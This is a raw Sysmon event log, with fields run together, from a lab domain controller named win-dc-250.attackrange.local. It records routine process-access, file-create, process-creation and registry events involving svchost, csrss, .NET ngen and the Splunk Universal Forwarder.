13:22:15.400{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4587-6000-4A02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.384{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4587-6000-4A02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.384{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4587-6000-4A02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:15.322{08A6967A-4586-6000-4802-000000009A01}5028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13a4-0\System.Activities.DurableInstancing.dll2021-01-14 13:22:15.322 10341000x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4587-6000-4902-000000009A01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4587-6000-4902-000000009A01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.197{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4587-6000-4902-000000009A01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.198{08A6967A-4587-6000-4902-000000009A01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:22:16.541{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea78-0x47318fbc) 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4588-6000-4D02-000000009A01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 